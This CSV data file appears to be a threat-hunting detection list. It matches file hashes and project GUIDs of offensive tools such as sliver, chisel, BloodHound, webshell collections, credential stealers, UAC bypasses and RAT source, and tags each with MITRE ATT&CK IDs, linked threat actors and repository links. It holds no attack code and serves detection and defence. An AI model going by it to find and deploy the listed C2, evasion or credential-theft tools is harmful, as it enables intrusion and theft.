"*87998922dfe61e2c69bd8bd483f81668d961843d9afb491f0dc48694e19b4002*",".{0,1000}87998922dfe61e2c69bd8bd483f81668d961843d9afb491f0dc48694e19b4002.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","30397"
"*879a204ae929df09dacb239b3a1224069c6a48de328adab89c91c02b2937c74c*",".{0,1000}879a204ae929df09dacb239b3a1224069c6a48de328adab89c91c02b2937c74c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30398"
"*879A49C7-0493-4235-85F6-EBF962613A76*",".{0,1000}879A49C7\-0493\-4235\-85F6\-EBF962613A76.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","#GUIDproject","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","30399"
"*87ad24ba9c07337abc8310c7107359fdcf86b9e182b7b93e1f375888fb82dfc1*",".{0,1000}87ad24ba9c07337abc8310c7107359fdcf86b9e182b7b93e1f375888fb82dfc1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30405"
"*87ae04b11731fe410b0e3bc87e6c99150dc9ba79bfcbd0ec4bf368930e6e2e7b*",".{0,1000}87ae04b11731fe410b0e3bc87e6c99150dc9ba79bfcbd0ec4bf368930e6e2e7b.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","30406"
"*87b841b9eedbe53eea82fdd3553b459fd1041d757dd1c2279429739fc9c8f7a0*",".{0,1000}87b841b9eedbe53eea82fdd3553b459fd1041d757dd1c2279429739fc9c8f7a0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30407"
"*87beb1086bd0d4b1a6e66fa634eadcbf379c7fae17967f61b8cf97fad6bb4887*",".{0,1000}87beb1086bd0d4b1a6e66fa634eadcbf379c7fae17967f61b8cf97fad6bb4887.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","30408"
"*87bebb9efbb1fe180ef24187b681894eaf6ce874e7d723299b37d10712b59176*",".{0,1000}87bebb9efbb1fe180ef24187b681894eaf6ce874e7d723299b37d10712b59176.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30409"
"*87BEF4D7-813E-48BA-96FE-E3A24BF2DC34*",".{0,1000}87BEF4D7\-813E\-48BA\-96FE\-E3A24BF2DC34.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","30410"
"*87c4041617fc7010b7e20630ae48cc8c17dc84cd6fb5c330f0bc92af52baa2fa*",".{0,1000}87c4041617fc7010b7e20630ae48cc8c17dc84cd6fb5c330f0bc92af52baa2fa.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#filehash","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","30413"
"*87c51194806fc56b347e34b41c845c3fbe2c9602cdeb3b355d1215182013e613*",".{0,1000}87c51194806fc56b347e34b41c845c3fbe2c9602cdeb3b355d1215182013e613.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","30414"
"*87c96e5d650e67d985bdbb2bf4be55c94f8b967b180d45c1c073cbcd57cf1ddb*",".{0,1000}87c96e5d650e67d985bdbb2bf4be55c94f8b967b180d45c1c073cbcd57cf1ddb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30415"
"*87e26c35fb03226e9a2252b65bf017f9e1921aafadc28de78ea583eb5730ea7e*",".{0,1000}87e26c35fb03226e9a2252b65bf017f9e1921aafadc28de78ea583eb5730ea7e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30418"
"*87ea7ed313b723b21d126d3a9ffa5daa2a9713853f1fba9274044b78fac9f40f*",".{0,1000}87ea7ed313b723b21d126d3a9ffa5daa2a9713853f1fba9274044b78fac9f40f.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30420"
"*87ea7ed313b723b21d126d3a9ffa5daa2a9713853f1fba9274044b78fac9f40f*",".{0,1000}87ea7ed313b723b21d126d3a9ffa5daa2a9713853f1fba9274044b78fac9f40f.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30421"
"*87ebba9881dfa1757459d72857e2f03132b83291e29d6b92096e9ca3d6dd14f3*",".{0,1000}87ebba9881dfa1757459d72857e2f03132b83291e29d6b92096e9ca3d6dd14f3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30422"
"*87f28c29263f95595eaa3c35a9091eaa5ccadce9f84738309f8781328465ede2*",".{0,1000}87f28c29263f95595eaa3c35a9091eaa5ccadce9f84738309f8781328465ede2.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","30423"
"*87f65cfedc589113ba5daa88384928e45b4923bd6b9b0fb47e3c112e11fcf353*",".{0,1000}87f65cfedc589113ba5daa88384928e45b4923bd6b9b0fb47e3c112e11fcf353.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30424"
"*880b020391f6702f07775929110ac0f9aff0cec6fce2bd8e1e079bcace792e33*",".{0,1000}880b020391f6702f07775929110ac0f9aff0cec6fce2bd8e1e079bcace792e33.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","#filehash","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","30428"
"*88113ededbda181be6c6f9bd4ba8145666b48bf9e9b8dc170e66e884b10fdc91*",".{0,1000}88113ededbda181be6c6f9bd4ba8145666b48bf9e9b8dc170e66e884b10fdc91.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30429"
"*88147650f66ab1b4ec3d2a97ef8083ebd78cfdde63f7a5bad73b2d4e9e48a365*",".{0,1000}88147650f66ab1b4ec3d2a97ef8083ebd78cfdde63f7a5bad73b2d4e9e48a365.{0,1000}","offensive_tool_keyword","Adzok","RAT tool - a variant of Adwind abused by TA","T1219 - T1105 - T1027 - T1059 - T1204","TA0011 - TA0005 - TA0002 - TA0008","N/A","Packrat","Malware","https://sourceforge.net/projects/adzok/files/Adzok_Open_v1.0.0.2.jar/download","1","0","#filehash","N/A","8","8","N/A","N/A","N/A","N/A","30430"
"*88184fc856b37ace040097bb476e71a445f8ef1ac3e66b6bcac98f29bb5bf64e*",".{0,1000}88184fc856b37ace040097bb476e71a445f8ef1ac3e66b6bcac98f29bb5bf64e.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","30432"
"*8819246132617282fade672cf544bff340d1a286980bce9c59b9ae41e221fc8f*",".{0,1000}8819246132617282fade672cf544bff340d1a286980bce9c59b9ae41e221fc8f.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","30433"
"*881a10b5415e1e8c83986a81ae9a126c361b21964e8db7b93149d236191b29a0*",".{0,1000}881a10b5415e1e8c83986a81ae9a126c361b21964e8db7b93149d236191b29a0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30434"
"*881b34736ca2118b27dbf1c9340930094cb735de8cb22dee9e1619537201b654*",".{0,1000}881b34736ca2118b27dbf1c9340930094cb735de8cb22dee9e1619537201b654.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30435"
"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*",".{0,1000}881D4D67\-46DD\-4F40\-A813\-C9D3C8BE0965.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","#GUIDproject","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","30436"
"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*",".{0,1000}881D4D67\-46DD\-4F40\-A813\-C9D3C8BE0965.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#GUIDproject","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","30437"
"*8822c7fa386065eace366042536dcbc277a5be58efae8ce02bf9e4c583e07918*",".{0,1000}8822c7fa386065eace366042536dcbc277a5be58efae8ce02bf9e4c583e07918.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","30439"
"*8838860eb9971c0490c4fa221b8774b95eaedd0f39ce12a94d4035eaab7a4514*",".{0,1000}8838860eb9971c0490c4fa221b8774b95eaedd0f39ce12a94d4035eaab7a4514.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30440"
"*88391b7725953b6c37aa40ce11c2f80894ed4216f3972bef9c5738cc1771b143*",".{0,1000}88391b7725953b6c37aa40ce11c2f80894ed4216f3972bef9c5738cc1771b143.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#filehash","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","30441"
"*8839f297dba4758e6c37d5b13f6fb47e19338798a2e4e61cef77d2423fcf7eef*",".{0,1000}8839f297dba4758e6c37d5b13f6fb47e19338798a2e4e61cef77d2423fcf7eef.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","30442"
"*883a4ec63fe55655eacd7062f2920f8b3a9bb89c8ea4ad8f9b02fd7c2f6f3069*",".{0,1000}883a4ec63fe55655eacd7062f2920f8b3a9bb89c8ea4ad8f9b02fd7c2f6f3069.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30443"
"*8845A8AF-34DC-4EBC-8223-B35F8CC8A900*",".{0,1000}8845A8AF\-34DC\-4EBC\-8223\-B35F8CC8A900.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#GUIDproject","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","30444"
"*8847bcf8ffca87a3ca02bfb7947b5ad147281350a66b25bf5b5495b2dc7c36b9*",".{0,1000}8847bcf8ffca87a3ca02bfb7947b5ad147281350a66b25bf5b5495b2dc7c36b9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30445"
"*8847d2aebb87f30333220ad16142fc49469e5451533137686cb4d2760836c3a8*",".{0,1000}8847d2aebb87f30333220ad16142fc49469e5451533137686cb4d2760836c3a8.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","30446"
"*884e9a4943a42933a5e1413349872ed3f48140a58f442a43615e8778d8656d89*",".{0,1000}884e9a4943a42933a5e1413349872ed3f48140a58f442a43615e8778d8656d89.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30449"
"*88552e15e5ce836e9f7f1b12b55ca6b3805641d577fb71663d2c8fc5fb96ce47*",".{0,1000}88552e15e5ce836e9f7f1b12b55ca6b3805641d577fb71663d2c8fc5fb96ce47.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30450"
"*8857efba9865de5690af4a3559f4839286cd2083f752ba93c30bd969c6636170*",".{0,1000}8857efba9865de5690af4a3559f4839286cd2083f752ba93c30bd969c6636170.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30451"
"*885a208a7a8ea9e37a44cef5ec2d8ee8ec7240e97b7ee7b9bda5dbf03553bf75*",".{0,1000}885a208a7a8ea9e37a44cef5ec2d8ee8ec7240e97b7ee7b9bda5dbf03553bf75.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","30452"
"*88607a2ed607b9c44dbfe49dec1ec78d963c055fd8a9153bfaa0a8ce3a90b37c*",".{0,1000}88607a2ed607b9c44dbfe49dec1ec78d963c055fd8a9153bfaa0a8ce3a90b37c.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30453"
"*8861dd060f4b09113d6b8b10c213472d0ac3fe0f654724ec90fb5398ddf890e3*",".{0,1000}8861dd060f4b09113d6b8b10c213472d0ac3fe0f654724ec90fb5398ddf890e3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30454"
"*88689c44114bf5819480752db5e955f0e74a2141d3f4b59f7030203eb2fb458d*",".{0,1000}88689c44114bf5819480752db5e955f0e74a2141d3f4b59f7030203eb2fb458d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30455"
"*886913aabc03e8863c9fa20034054a2fc289c8bfa838e5481d5d7e90e1d043a0*",".{0,1000}886913aabc03e8863c9fa20034054a2fc289c8bfa838e5481d5d7e90e1d043a0.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30456"
"*886c0eac43136acee5b85b22c72965d63faf9b9f70ed28deca9c3b028b22dee8*",".{0,1000}886c0eac43136acee5b85b22c72965d63faf9b9f70ed28deca9c3b028b22dee8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30458"
"*886C26DC-0073-4BB7-823B-2B9DAD53DB8B*",".{0,1000}886C26DC\-0073\-4BB7\-823B\-2B9DAD53DB8B.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","30459"
"*886ce8cf3c9c8a6e8a4db1c3286151c9af6a3fbe7269a5df5269d9ffa6a8c992*",".{0,1000}886ce8cf3c9c8a6e8a4db1c3286151c9af6a3fbe7269a5df5269d9ffa6a8c992.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30460"
"*886de66b761338d87027254c40da3ea0fd9072fc301c1b8fdd2e4d652e231dea*",".{0,1000}886de66b761338d87027254c40da3ea0fd9072fc301c1b8fdd2e4d652e231dea.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30461"
"*8879933fd0c682fa48bfa79023b5730f6ee8e984e8cde1b275a64b098473e424*",".{0,1000}8879933fd0c682fa48bfa79023b5730f6ee8e984e8cde1b275a64b098473e424.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30464"
